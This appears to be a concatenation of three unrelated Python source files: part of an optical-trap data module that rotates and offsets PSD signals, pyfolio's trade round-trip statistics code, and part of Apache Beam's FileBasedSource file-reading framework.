self.update_fig()
def calculate_plateaus(self):
"""
Calculate the plateaus according to the offsets and the angles of
data_based.
"""
# recalculate data for plotting
traces = ['psdX', 'psdY', 'psdZ', 'positionX', 'positionY',
'positionZ']
data_based = self.modification._get_data_based(
traces=traces, window=False, decimate=True)
# subtract offsets
data_based[:, 0] -= self.modification.iattributes.offsetPsdX
data_based[:, 1] -= self.modification.iattributes.offsetPsdY
data_based[:, 2] -= self.modification.iattributes.offsetPsdZ
# set positionZ and calibration, needed by
# self.rotate -> self.rot_factor
# make sure that both position signal and calibration are taken form
# self.view_apply
positionZ = data_based[:, hp.slicify(5)]
calibration = self.modification.view_based.calibration
# rotate psd
data_based[:, 0], data_based[:, 1], data_based[:, 2] \
= self.modification.rotate(
data_based[:, 0], data_based[:, 1],
data_based[:, 2], positionZ, calibration)
# set some variable names for easy access of data_based
psdXYZ = data_based[:, hp.slicify([0, 1, 2])]
positionXYZ = data_based[:, hp.slicify([3, 4, 5])]
positionXY = data_based[:, hp.slicify([3, 4])]
positionZ = data_based[:, hp.slicify(5)]
# calculate extension
distanceXYZ = tr.distanceXYZ(positionXYZ, psdXYZ=psdXYZ,
calibration=calibration)
distance = tr.distance(distanceXYZ, positionXY)
extension = tr.extension(distance, calibration.radius)
# calculate force
displacementXYZ = calibration.displacement(psdXYZ, positionZ=positionZ)
# Get the force acting in the same direction as the displacement
fXYZ = calibration.force(displacementXYZ, positionZ=positionZ)
force = tr.force(tr.forceXYZ(psdXYZ, calibration=calibration,
positionZ=positionZ),
positionXY)
force = {'3D': force,
'X': fXYZ[:, 0],
'Y': fXYZ[:, 1],
'Z': fXYZ[:, 2]}
# determine regions where DNA is stretched to the right and left side
ex = self.modification._excited()
excited_position = self.modification._NAME['position'][ex]
positionEl = traces.index(excited_position)
signal = data_based[:, positionEl] # [positionE]
resolution = self.modification.view_based.samplingrate \
/ self.modification.decimate
minima, maxima = sn.get_extrema(signal, resolution)
rightstress, _, leftstress \
= sn.get_sections(signal, minima, maxima)[1][0:3]
# set plateau data arrays
self.rightextension = extension[rightstress]
self.leftextension = extension[leftstress]
for plot in self._axes:
self.rightforce[plot] = force[plot][rightstress]
self.leftforce[plot] = force[plot][leftstress]
class Rotation(Modification):
GRAPHICALMOD = IRotation
def __init__(self, **kwargs):
traces_apply = ['psdX', 'psdY', 'psdZ']
super().__init__(datapoints=12000, traces_apply=traces_apply, **kwargs)
# Define parameters that are used to calculate the modification
# the angles the ellipsoid has to be rotated
# rotation around X
self.add_iattribute('angleX', description='Angle about X (deg)',
value=0.0)
self.add_iattribute('angleY', description='Angle about Y (deg)',
value=0.0)
self.add_iattribute('angleZ', description='Angle about Z (deg)',
value=0.0)
# offset of PSD relative to trap center position of bead
self.add_iattribute('offsetPsdX', description='Offset PSD X (V)',
value=0.0)
self.add_iattribute('offsetPsdY', description='Offset PSD Y (V)',
value=0.0)
self.add_iattribute('offsetPsdZ', description='Offset PSD Z (V)',
value=0.0)
# Parameters for rotation matrix calculation
self.rotation_method = 'm' # 'N', 'm' or 'V'
def _print_info(self):
print((" Rotation is in '%s' space" % self.rotation_method))
def _modify(self, data, samples, data_traces, data_index, mod_index):
# Get data that is needed for the rotation modification, but is not
# contained in the data array, that is requested to be getting modified
# (`data_traces` in `data`)
needed_traces = self.traces_apply # traces_apply
needed_traces.append('positionZ') # psdX, psdY, psdZ, positionZ
# calculate missing traces
extra_traces = hp.missing_elements(needed_traces, data_traces)
extra_data = self._get_data_apply(samples=samples, traces=extra_traces,
copy=False)
# combine assigned data and traces with extra fetched data and traces
traces_tuple = (data_traces, extra_traces)
data_tuple = (data, extra_data)
# function to easily get data for a trace from different data
def get_target_data(target_trace, traces_tuple, data_tuple):
target_data = None
for i, traces in enumerate(traces_tuple):
if target_trace in traces:
index = traces.index(target_trace)
target_data = data_tuple[i][:, index]
return target_data
# get psdX, psdY and psdZ
l_data = {}
for trace in self.traces_apply:
l_data[trace] = get_target_data(trace, traces_tuple, data_tuple)
# correct for offset of psds
x = self.iattributes.offsetPsdX
y = self.iattributes.offsetPsdY
z = self.iattributes.offsetPsdZ
if x != 0.0:
l_data['psdX'] = l_data['psdX'] - x
if y != 0.0:
l_data['psdY'] = l_data['psdY'] - y
if z != 0.0:
l_data['psdZ'] = l_data['psdZ'] - z
# positionZ and calibration, needed by
# self.rotate -> self.rot_factor
# make sure that both position signal and calibration are taken form
# self.view_apply
positionZ = get_target_data('positionZ', traces_tuple, data_tuple)
calibration = self.view_apply.calibration
# rotate the data
l_data['psdX'], l_data['psdY'], l_data['psdZ'] \
= self.rotate(l_data['psdX'], l_data['psdY'], l_data['psdZ'],
positionZ, calibration)
for trace in self.traces_apply:
if trace in data_traces:
index = data_traces.index(trace)
data[:, index] = l_data[trace]
return data
def rotate(self, data_x, data_y, data_z, positionZ, calibration):
ax = self.iattributes.angleX
ay = self.iattributes.angleY
az = self.iattributes.angleZ
if ax == 0.0 and ay == 0.0 and az == 0.0:
return (data_x, data_y, data_z)
x = ax * np.pi / 180.0
y = ay * np.pi / 180.0
z = az * np.pi / 180.0
cf = self.calibration_factor(positionZ, calibration)
rf = self.rot_factor
# https://www.siggraph.org/education/materials/HyperGraph/modeling/mod_tran/3drota.htm
# angle about axis ...
x_o = data_x
y_o = data_y
z_o = data_z
# right handed coordinate system
# rotation is counterclockwise about the axis coming out of the image
# plane
# z should always be <= 0 (negative), because the bead is stressed down
#
# rotate about x
#
# z |
# |
# |
# |_______ y
# /
# /
# x /
#
if x == 0.0:
y_2 = y_o
z_2 = z_o
else:
cos_x = np.cos(x)
sin_x = np.sin(x)
y_2 = y_o * cos_x - z_o * rf(2, 1, cf) * sin_x
z_2 = z_o * cos_x + y_o * rf(1, 2, cf) * sin_x
# rotate about y
#
# x |
# |
# |
# |_______ z
# /
# /
# y /
#
if y == 0.0:
z_o = z_2
x_2 = x_o
else:
cos_y = np.cos(y)
sin_y = np.sin(y)
z_o = z_2 * cos_y - x_o * rf(0, 2, cf) * sin_y
x_2 = x_o * cos_y + z_2 * rf(2, 0, cf) * sin_y
# rotate about z
#
# y |
# |
# |
# |_______ x
# /
# /
# z /
#
if z == 0.0:
x_o = x_2
y_o = y_2
else:
cos_z = np.cos(z)
sin_z = np.sin(z)
x_o = x_2 * cos_z - y_2 * rf(1, 0, cf) * sin_z
y_o = y_2 * cos_z + x_2 * rf(0, 1, cf) * sin_z
return (x_o, y_o, z_o)
def calibration_factor(self, positionZ, calibration):
# position signal, to calculate height dependent calibration factors
if positionZ.ndim < 2:
positionZ = positionZ[:, np.newaxis]
# rotation in m space
if self.rotation_method == 'm':
# beta in m/V, displacement sensitivity
beta = calibration.beta(positionZ)[:, 0:3]
factor = beta
# rotation in pN space
elif self.rotation_method == 'N':
# beta in m/V, displacement sensitivity
beta = calibration.beta(positionZ)[:, 0:3]
# N/m, stiffness
kappa = calibration.kappa(positionZ)[:, 0:3]
factor = kappa * beta
else:
# self.rotation_method == 'V' # rotation in V space
factor = 1.0
return factor
def rot_factor(self, a, b, calibration_factor):
"""
Calculates a weighting factor for rotating the 3D QPD signal in V via
the signal in N (stiffness * displacement_sensitivity), m
(displacement_sensitivity), or V space.
(If you rotate a vector in N space, the absolute value (force) should
stay the same, regardless of the axis. A rotation in V space would lead
to bias, due to the different displacement sensitivities and
stiffnesses of all three axes.)
To calculate the factors, this method uses the calibration of the
view, this modification is applied to.
"""
cf = calibration_factor
if self.rotation_method == 'm' or self.rotation_method == 'N':
factor = cf[:, a] / cf[:, b]
else:
factor = 1.0
return factor
def Rxyz(self, positionZ, calibration, x=0.0, y=0.0, z=0.0):
"""
Create rotationmatrix along x, y and z in degrees.
Rotation for data with N samples and 3 dimensions (XYZ):
R = Rxyz(x,y,z)
data_rot = np.dot(data, R.T)
Rxyz takes the mean() of the rotation factors, calculated by
self.rot_factor()!
"""
# angle about axis ...
x = x * np.pi / 180.0
y = y * np.pi / 180.0
z = z * np.pi / 180.0
f = self.rot_factor # calculate weighting factors
fXY = f(0, 1, positionZ, calibration).mean()
fXZ = f(0, 2, positionZ, calibration).mean()
fYX = f(1, 0, positionZ, calibration).mean()
fYZ = f(1, 2, positionZ, calibration).mean()
fZX = f(2, 0, positionZ, calibration).mean()
fZY = f(2, 1, positionZ, calibration).mean()
Rx = np.matrix([[ 1.0, 0.0, 0.0 ],
[ 0.0, np.cos(x), -fZY*np.sin(x) ],
[ 0.0, fYZ*np.sin(x), np.cos(x) ]])
Ry = np.matrix([[ np.cos(y), 0.0, -fZX*np.sin(y) ],
[ 0.0, 1.0, 0.0 ],
[ fXZ*np.sin(y), 0.0, np.cos(y) ]])
Rz = np.matrix([[ np.cos(z), -fYX*np.sin(z), 0.0 ],
[ fXY*np.sin(z), np.cos(z), 0.0 ],
[ 0.0, 0.0, 1.0 ]])
return Rx*Ry*Rz
# The following is only to update to database version 0.8.0
class GRotation(Rotation):
pass
|
|
#
# Copyright 2016 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
from math import copysign
import warnings
from collections import deque, OrderedDict
import pandas as pd
import numpy as np
from .utils import print_table, format_asset
PNL_STATS = OrderedDict(
[('Total profit', lambda x: x.sum()),
('Gross profit', lambda x: x[x > 0].sum()),
('Gross loss', lambda x: x[x < 0].sum()),
('Profit factor', lambda x: x[x > 0].sum() / x[x < 0].abs().sum()
if x[x < 0].abs().sum() != 0 else np.nan),
('Avg. trade net profit', 'mean'),
('Avg. winning trade', lambda x: x[x > 0].mean()),
('Avg. losing trade', lambda x: x[x < 0].mean()),
('Ratio Avg. Win:Avg. Loss', lambda x: x[x > 0].mean() /
x[x < 0].abs().mean() if x[x < 0].abs().mean() != 0 else np.nan),
('Largest winning trade', 'max'),
('Largest losing trade', 'min'),
])
SUMMARY_STATS = OrderedDict(
[('Total number of round_trips', 'count'),
('Percent profitable', lambda x: len(x[x > 0]) / float(len(x))),
('Winning round_trips', lambda x: len(x[x > 0])),
('Losing round_trips', lambda x: len(x[x < 0])),
('Even round_trips', lambda x: len(x[x == 0])),
])
RETURN_STATS = OrderedDict(
[('Avg returns all round_trips', lambda x: x.mean()),
('Avg returns winning', lambda x: x[x > 0].mean()),
('Avg returns losing', lambda x: x[x < 0].mean()),
('Median returns all round_trips', lambda x: x.median()),
('Median returns winning', lambda x: x[x > 0].median()),
('Median returns losing', lambda x: x[x < 0].median()),
('Largest winning trade', 'max'),
('Largest losing trade', 'min'),
])
DURATION_STATS = OrderedDict(
[('Avg duration', lambda x: x.mean()),
('Median duration', lambda x: x.median()),
('Longest duration', lambda x: x.max()),
('Shortest duration', lambda x: x.min())
# FIXME: Instead of x.max() - x.min() this should be
# rts.close_dt.max() - rts.open_dt.min() which is not
# available here. As it would require a new approach here
# that passes in multiple fields we disable these measures
# for now.
# ('Avg # round_trips per day', lambda x: float(len(x)) /
# (x.max() - x.min()).days),
# ('Avg # round_trips per month', lambda x: float(len(x)) /
# (((x.max() - x.min()).days) / APPROX_BDAYS_PER_MONTH)),
])
def agg_all_long_short(round_trips, col, stats_dict):
stats_all = (round_trips
.assign(ones=1)
.groupby('ones')[col]
.agg(stats_dict)
.T
.rename(columns={1.0: 'All trades'}))
stats_long_short = (round_trips
.groupby('long')[col]
.agg(stats_dict)
.T
.rename(columns={False: 'Short trades',
True: 'Long trades'}))
return stats_all.join(stats_long_short)
def _groupby_consecutive(txn, max_delta=pd.Timedelta('8h')):
"""Merge transactions of the same direction separated by less than
max_delta time duration.
Parameters
----------
transactions : pd.DataFrame
Prices and amounts of executed round_trips. One row per trade.
- See full explanation in tears.create_full_tear_sheet
max_delta : pandas.Timedelta (optional)
Merge transactions in the same direction separated by less
than max_delta time duration.
Returns
-------
transactions : pd.DataFrame
"""
def vwap(transaction):
if transaction.amount.sum() == 0:
warnings.warn('Zero transacted shares, setting vwap to nan.')
return np.nan
return (transaction.amount * transaction.price).sum() / \
transaction.amount.sum()
out = []
for _, t in txn.groupby('symbol'):
t = t.sort_index()
t.index.name = 'dt'
t = t.reset_index()
t['order_sign'] = t.amount > 0
t['block_dir'] = (t.order_sign.shift(
1) != t.order_sign).astype(int).cumsum()
t['block_time'] = ((t.dt.sub(t.dt.shift(1))) >
max_delta).astype(int).cumsum()
grouped_price = (t.groupby(['block_dir',
'block_time'])
.apply(vwap))
grouped_price.name = 'price'
grouped_rest = t.groupby(['block_dir', 'block_time']).agg({
'amount': 'sum',
'symbol': 'first',
'dt': 'first'})
grouped = grouped_rest.join(grouped_price)
out.append(grouped)
out = pd.concat(out)
out = out.set_index('dt')
return out
def extract_round_trips(transactions,
portfolio_value=None):
"""Group transactions into "round trips". First, transactions are
grouped by day and directionality. Then, long and short
transactions are matched to create round-trip round_trips for which
PnL, duration and returns are computed. Crossings where a position
changes from long to short and vice-versa are handled correctly.
Under the hood, we reconstruct the individual shares in a
portfolio over time and match round_trips in a FIFO-order.
For example, the following transactions would constitute one round trip:
index amount price symbol
2004-01-09 12:18:01 10 50 'AAPL'
2004-01-09 15:12:53 10 100 'AAPL'
2004-01-13 14:41:23 -10 100 'AAPL'
2004-01-13 15:23:34 -10 200 'AAPL'
First, the first two and last two round_trips will be merged into a two
single transactions (computing the price via vwap). Then, during
the portfolio reconstruction, the two resulting transactions will
be merged and result in 1 round-trip trade with a PnL of
(150 * 20) - (75 * 20) = 1500.
Note, that round trips do not have to close out positions
completely. For example, we could have removed the last
transaction in the example above and still generated a round-trip
over 10 shares with 10 shares left in the portfolio to be matched
with a later transaction.
Parameters
----------
transactions : pd.DataFrame
Prices and amounts of executed round_trips. One row per trade.
- See full explanation in tears.create_full_tear_sheet
portfolio_value : pd.Series (optional)
Portfolio value (all net assets including cash) over time.
Note that portfolio_value needs to beginning of day, so either
use .shift() or positions.sum(axis='columns') / (1+returns).
Returns
-------
round_trips : pd.DataFrame
DataFrame with one row per round trip. The returns column
contains returns in respect to the portfolio value while
rt_returns are the returns in regards to the invested capital
into that partiulcar round-trip.
"""
transactions = _groupby_consecutive(transactions)
roundtrips = []
for sym, trans_sym in transactions.groupby('symbol'):
trans_sym = trans_sym.sort_index()
price_stack = deque()
dt_stack = deque()
trans_sym['signed_price'] = trans_sym.price * \
np.sign(trans_sym.amount)
trans_sym['abs_amount'] = trans_sym.amount.abs().astype(int)
for dt, t in trans_sym.iterrows():
if t.price < 0:
warnings.warn('Negative price detected, ignoring for'
'round-trip.')
continue
indiv_prices = [t.signed_price] * t.abs_amount
if (len(price_stack) == 0) or \
(copysign(1, price_stack[-1]) == copysign(1, t.amount)):
price_stack.extend(indiv_prices)
dt_stack.extend([dt] * len(indiv_prices))
else:
# Close round-trip
pnl = 0
invested = 0
cur_open_dts = []
for price in indiv_prices:
if len(price_stack) != 0 and \
(copysign(1, price_stack[-1]) != copysign(1, price)):
# Retrieve first dt, stock-price pair from
# stack
prev_price = price_stack.popleft()
prev_dt = dt_stack.popleft()
pnl += -(price + prev_price)
cur_open_dts.append(prev_dt)
invested += abs(prev_price)
else:
# Push additional stock-prices onto stack
price_stack.append(price)
dt_stack.append(dt)
roundtrips.append({'pnl': pnl,
'open_dt': cur_open_dts[0],
'close_dt': dt,
'long': price < 0,
'rt_returns': pnl / invested,
'symbol': sym,
})
roundtrips = pd.DataFrame(roundtrips)
roundtrips['duration'] = roundtrips['close_dt'].sub(roundtrips['open_dt'])
if portfolio_value is not None:
# Need to normalize so that we can join
pv = pd.DataFrame(portfolio_value,
columns=['portfolio_value'])\
.assign(date=portfolio_value.index)
roundtrips['date'] = roundtrips.close_dt.apply(lambda x:
x.replace(hour=0,
minute=0,
second=0))
tmp = (roundtrips.set_index('date')
.join(pv.set_index('date'), lsuffix='_')
.reset_index())
roundtrips['returns'] = tmp.pnl / tmp.portfolio_value
roundtrips = roundtrips.drop('date', axis='columns')
return roundtrips
def add_closing_transactions(positions, transactions):
"""
Appends transactions that close out all positions at the end of
the timespan covered by positions data. Utilizes pricing information
in the positions DataFrame to determine closing price.
Parameters
----------
positions : pd.DataFrame
The positions that the strategy takes over time.
transactions : pd.DataFrame
Prices and amounts of executed round_trips. One row per trade.
- See full explanation in tears.create_full_tear_sheet
Returns
-------
closed_txns : pd.DataFrame
Transactions with closing transactions appended.
"""
closed_txns = transactions[['symbol', 'amount', 'price']]
pos_at_end = positions.drop('cash', axis=1).iloc[-1]
open_pos = pos_at_end.replace(0, np.nan).dropna()
# Add closing round_trips one second after the close to be sure
# they don't conflict with other round_trips executed at that time.
end_dt = open_pos.name + pd.Timedelta(seconds=1)
for sym, ending_val in open_pos.iteritems():
txn_sym = transactions[transactions.symbol == sym]
ending_amount = txn_sym.amount.sum()
ending_price = ending_val / ending_amount
closing_txn = OrderedDict([
('amount', -ending_amount),
('price', ending_price),
('symbol', sym),
])
closing_txn = pd.DataFrame(closing_txn, index=[end_dt])
closed_txns = closed_txns.append(closing_txn)
closed_txns = closed_txns[closed_txns.amount != 0]
return closed_txns
def apply_sector_mappings_to_round_trips(round_trips, sector_mappings):
"""
Translates round trip symbols to sectors.
Parameters
----------
round_trips : pd.DataFrame
DataFrame with one row per round trip trade.
- See full explanation in round_trips.extract_round_trips
sector_mappings : dict or pd.Series, optional
Security identifier to sector mapping.
Security ids as keys, sectors as values.
Returns
-------
sector_round_trips : pd.DataFrame
Round trips with symbol names replaced by sector names.
"""
sector_round_trips = round_trips.copy()
sector_round_trips.symbol = sector_round_trips.symbol.apply(
lambda x: sector_mappings.get(x, 'No Sector Mapping'))
sector_round_trips = sector_round_trips.dropna(axis=0)
return sector_round_trips
def gen_round_trip_stats(round_trips):
"""Generate various round-trip statistics.
Parameters
----------
round_trips : pd.DataFrame
DataFrame with one row per round trip trade.
- See full explanation in round_trips.extract_round_trips
Returns
-------
stats : dict
A dictionary where each value is a pandas DataFrame containing
various round-trip statistics.
See also
--------
round_trips.print_round_trip_stats
"""
stats = {}
stats['pnl'] = agg_all_long_short(round_trips, 'pnl', PNL_STATS)
stats['summary'] = agg_all_long_short(round_trips, 'pnl',
SUMMARY_STATS)
stats['duration'] = agg_all_long_short(round_trips, 'duration',
DURATION_STATS)
stats['returns'] = agg_all_long_short(round_trips, 'returns',
RETURN_STATS)
stats['symbols'] = \
round_trips.groupby('symbol')['returns'].agg(RETURN_STATS).T
return stats
def print_round_trip_stats(round_trips, hide_pos=False):
"""Print various round-trip statistics. Tries to pretty-print tables
with HTML output if run inside IPython NB.
Parameters
----------
round_trips : pd.DataFrame
DataFrame with one row per round trip trade.
- See full explanation in round_trips.extract_round_trips
See also
--------
round_trips.gen_round_trip_stats
"""
stats = gen_round_trip_stats(round_trips)
print_table(stats['summary'], float_format='{:.2f}'.format,
name='Summary stats')
print_table(stats['pnl'], float_format='${:.2f}'.format, name='PnL stats')
print_table(stats['duration'], float_format='{:.2f}'.format,
name='Duration stats')
print_table(stats['returns'] * 100, float_format='{:.2f}%'.format,
name='Return stats')
if not hide_pos:
stats['symbols'].columns = stats['symbols'].columns.map(format_asset)
print_table(stats['symbols'] * 100,
float_format='{:.2f}%'.format, name='Symbol stats')
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A framework for developing sources for new file types.
To create a source for a new file type a sub-class of :class:`FileBasedSource`
should be created. Sub-classes of :class:`FileBasedSource` must implement the
method :meth:`FileBasedSource.read_records()`. Please read the documentation of
that method for more details.
For an example implementation of :class:`FileBasedSource` see
:class:`~apache_beam.io._AvroSource`.
"""
from six import integer_types
from six import string_types
from apache_beam.internal import pickler
from apache_beam.io import concat_source
from apache_beam.io import iobase
from apache_beam.io import range_trackers
from apache_beam.io.filesystem import CompressionTypes
from apache_beam.io.filesystems import FileSystems
from apache_beam.io.restriction_trackers import OffsetRange
from apache_beam.options.value_provider import StaticValueProvider
from apache_beam.options.value_provider import ValueProvider
from apache_beam.options.value_provider import check_accessible
from apache_beam.transforms.core import DoFn
from apache_beam.transforms.core import ParDo
from apache_beam.transforms.core import PTransform
from apache_beam.transforms.display import DisplayDataItem
from apache_beam.transforms.util import Reshuffle
MAX_NUM_THREADS_FOR_SIZE_ESTIMATION = 25
__all__ = ['FileBasedSource']
class FileBasedSource(iobase.BoundedSource):
"""A :class:`~apache_beam.io.iobase.BoundedSource` for reading a file glob of
a given type."""
MIN_NUMBER_OF_FILES_TO_STAT = 100
MIN_FRACTION_OF_FILES_TO_STAT = 0.01
def __init__(self,
file_pattern,
min_bundle_size=0,
compression_type=CompressionTypes.AUTO,
splittable=True,
validate=True):
"""Initializes :class:`FileBasedSource`.
Args:
file_pattern (str): the file glob to read a string or a
:class:`~apache_beam.options.value_provider.ValueProvider`
(placeholder to inject a runtime value).
min_bundle_size (str): minimum size of bundles that should be generated
when performing initial splitting on this source.
compression_type (str): Used to handle compressed output files.
Typical value is :attr:`CompressionTypes.AUTO
<apache_beam.io.filesystem.CompressionTypes.AUTO>`,
in which case the final file path's extension will be used to detect
the compression.
splittable (bool): whether :class:`FileBasedSource` should try to
logically split a single file into data ranges so that different parts
of the same file can be read in parallel. If set to :data:`False`,
:class:`FileBasedSource` will prevent both initial and dynamic splitting
of sources for single files. File patterns that represent multiple files
may still get split into sources for individual files. Even if set to
:data:`True` by the user, :class:`FileBasedSource` may choose to not
split the file, for example, for compressed files where currently it is
not possible to efficiently read a data range without decompressing the
whole file.
validate (bool): Boolean flag to verify that the files exist during the
pipeline creation time.
Raises:
~exceptions.TypeError: when **compression_type** is not valid or if
**file_pattern** is not a :class:`str` or a
:class:`~apache_beam.options.value_provider.ValueProvider`.
~exceptions.ValueError: when compression and splittable files are
specified.
~exceptions.IOError: when the file pattern specified yields an empty
result.
"""
if not isinstance(file_pattern, (string_types, ValueProvider)):
raise TypeError('%s: file_pattern must be of type string'
' or ValueProvider; got %r instead'
% (self.__class__.__name__, file_pattern))
if isinstance(file_pattern, string_types):
file_pattern = StaticValueProvider(str, file_pattern)
self._pattern = file_pattern
self._concat_source = None
self._min_bundle_size = min_bundle_size
if not CompressionTypes.is_valid_compression_type(compression_type):
raise TypeError('compression_type must be CompressionType object but '
'was %s' % type(compression_type))
self._compression_type = compression_type
self._splittable = splittable
if validate and file_pattern.is_accessible():
self._validate()
def display_data(self):
return {'file_pattern': DisplayDataItem(str(self._pattern),
label="File Pattern"),
'compression': DisplayDataItem(str(self._compression_type),
label='Compression Type')}
@check_accessible(['_pattern'])
def _get_concat_source(self):
if self._concat_source is None:
pattern = self._pattern.get()
single_file_sources = []
match_result = FileSystems.match([pattern])[0]
files_metadata = match_result.metadata_list
# We create a reference for FileBasedSource that will be serialized along
# with each _SingleFileSource. To prevent this FileBasedSource from having
# a reference to ConcatSource (resulting in quadratic space complexity)
# we clone it here.
file_based_source_ref = pickler.loads(pickler.dumps(self))
for file_metadata in files_metadata:
file_name = file_metadata.path
file_size = file_metadata.size_in_bytes
if file_size == 0:
continue # Ignoring empty file.
# We determine splittability of this specific file.
splittable = (
self.splittable and
_determine_splittability_from_compression_type(
file_name, self._compression_type))
single_file_source = _SingleFileSource(
file_based_source_ref, file_name,
0,
file_size,
min_bundle_size=self._min_bundle_size,
splittable=splittable)
single_file_sources.append(single_file_source)
self._concat_source = concat_source.ConcatSource(single_file_sources)
return self._concat_source
def open_file(self, file_name):
return FileSystems.open(
file_name, 'application/octet-stream',
compression_type=self._compression_type)
@check_accessible(['_pattern'])
def _validate(self):
"""Validate if there are actual files in the specified glob pattern
"""
pattern = self._pattern.get()
# Limit the responses as we only want to check if something exists
match_result = FileSystems.match([pattern], limits=[1])[0]
if len(match_result.metadata_list) <= 0:
raise IOError(
'No files found based on the file pattern %s' % pattern)
def split(
self, desired_bundle_size=None, start_position=None, stop_position=None):
return self._get_concat_source().split(
desired_bundle_size=desired_bundle_size,
start_position=start_position,
stop_position=stop_position)
@check_accessible(['_pattern'])
def estimate_size(self):
pattern = self._pattern.get()
match_result = FileSystems.match([pattern])[0]
return sum([f.size_in_bytes for f in match_result.metadata_list])
def read(self, range_tracker):
return self._get_concat_source().read(range_tracker)
def get_range_tracker(self, start_position, stop_position):
return self._get_concat_source().get_range_tracker(start_position,
stop_position)
def read_records(self, file_name, offset_range_tracker):
"""Returns a generator of records created by reading file 'file_name'.
Args:
file_name: a ``string`` that gives the name of the file to be read. Method
``FileBasedSource.open_file()`` must be used to open the file
and create a seekable file object.
offset_range_tracker: a object of type ``OffsetRangeTracker``. This
defines the byte range of the file that should be
read. See documentation in
``iobase.BoundedSource.read()`` for more information
on reading records while complying to the range
defined by a given ``RangeTracker``.
Returns:
an iterator that gives the records read from the given file.
"""
raise NotImplementedError
@property
def splittable(self):
return self._splittable
def _determine_splittability_from_compression_type(
file_path, compression_type):
if compression_type == CompressionTypes.AUTO:
compression_type = CompressionTypes.detect_compression_type(file_path)
return compression_type == CompressionTypes.UNCOMPRESSED
class _SingleFileSource(iobase.BoundedSource):
"""Denotes a source for a specific file type."""
def __init__(self, file_based_source, file_name, start_offset, stop_offset,
min_bundle_size=0, splittable=True):
if not isinstance(start_offset, integer_types):
raise TypeError(
'start_offset must be a number. Received: %r' % start_offset)
if stop_offset != range_trackers.OffsetRangeTracker.OFFSET_INFINITY:
if not isinstance(stop_offset, integer_types):
raise TypeError(
'stop_offset must be a number. Received: %r' % stop_offset)
if start_offset >= stop_offset:
raise ValueError(
'start_offset must be smaller than stop_offset. Received %d and %d '
'for start and stop offsets respectively' %
(start_offset, stop_offset))
self._file_name = file_name
self._is_gcs_file = file_name.startswith('gs://') if file_name else False
self._start_offset = start_offset
self._stop_offset = stop_offset
self._min_bundle_size = min_bundle_size
self._file_based_source = file_based_source
self._splittable = splittable
def split(self, desired_bundle_size, start_offset=None, stop_offset=None):
if start_offset is None:
start_offset = self._start_offset
if stop_offset is None:
stop_offset = self._stop_offset
if self._splittable:
splits = OffsetRange(start_offset, stop_offset).split(
desired_bundle_size, self._min_bundle_size)
for split in splits:
yield iobase.SourceBundle(
split.stop - split.start,
_SingleFileSource(
# Copying this so that each sub-source gets a fresh instance.
pickler.loads(pickler.dumps(self._file_based_source)),
self._file_name,
split.start,
split.stop,
min_bundle_size=self._min_bundle_size,
splittable=self._splittable),
split.start,
split.stop)
else:
# Returning a single sub-source with end offset set to OFFSET_INFINITY (so
# that all data of the source gets read) since this source is
# unsplittable. Choosing size of the file as end offset will be wrong for
# certain unsplittable source, e.g., compressed sources.
yield iobase.SourceBundle(
stop_offset - start_offset,
_SingleFileSource(
self._file_based_source,
self._file_name,
start_offset,
range_trackers.OffsetRangeTracker.OFFSET_INFINITY,
min_bundle_size=self._min_bundle_size,
splittable=self._splittable
),
start_offset,
range_trackers.OffsetRangeTracker.OFFSET_INFINITY
)
def estimate_size(self):
return self._stop_offset - self._start_offset
def get_range_tracker(self, start_position, stop_position):
if start_position is None:
start_position = self._start_offset
if stop_position is None:
# If file is unsplittable we choose OFFSET_INFINITY as the default end
# offset so that all data of the source gets read. Choosing size of the
# file as end offset will be wrong for certain unsplittable source, for
# e.g., compressed sources.
stop_position = (
self._stop_offset if self._splittable
else range_trackers.OffsetRangeTracker.OFFSET_INFINITY)
range_tracker = range_trackers.OffsetRangeTracker(
start_position, stop_position)
if not self._splittable:
range_tracker = range_trackers.UnsplittableRangeTracker(range_tracker)
return range_tracker
def read(self, range_tracker):
return self._file_based_source.read_records(self._file_name, range_tracker)
def default_output_coder(self):
return self._file_based_source.default_output_coder()
class _ExpandIntoRanges(DoFn):
def __init__(
self, splittable, compression_type, desired_bundle_size, min_bundle_size):
self._desired_bundle_size = desired_bundle_size
self._min_bundle_size = min_bundle_size
self._splittable = splittable
self._compression_type = compression_type
def process(self, element, *args, **kwargs):
match_results = FileSystems.match([element])
for metadata in match_results[0].metadata_list:
splittable = (
self._splittable and
_determine_splittability_from_compression_type(
metadata.path, self._compression_type))
if splittable:
for split in OffsetRange(
0, metadata.size_in_bytes).split(
self._desired_bundle_size, self._min_bundle_size):
yield (metadata, split)
else:
yield (metadata, OffsetRange(
0, range_trackers.OffsetRangeTracker.OFFSET_INFINITY))
class _ReadRange(DoFn):
def __init__(self, source_from_file):
self._source_from_file = source_from_file
def process(self, element, *args, **kwargs):
metadata, range = element
source = self._source_from_file(metadata.path)
# Following split() operation has to be performed to create a proper
# _SingleFileSource. Otherwise what we have is a ConcatSource that contains
# a single _SingleFileSource. ConcatSource.read() expects a RangeTraker for
# sub-source range and reads full sub-sources (not byte ranges).
source = list(source.split(float('inf')))[0].source
for record in source.read(range.new_tracker()):
yield record
class ReadAllFiles(PTransform):
"""A Read transform that reads a PCollection of files.
Pipeline authors should not use this directly. This is to be used by Read
PTransform authors who wishes to implement file-based Read transforms that
read a PCollection of files.
"""
def __init__(
self, splittable, compression_type, desired_bundle_size, min_bundle_size,
source_from_file):
"""
Args:
splittable: If True, files won't be split into sub-ranges. If False, files
may or may not be split into data ranges.
compression_type: A ``CompressionType`` object that specifies the
compression type of the files that will be processed. If
``CompressionType.AUTO``, system will try to automatically
determine the compression type based on the extension of
files.
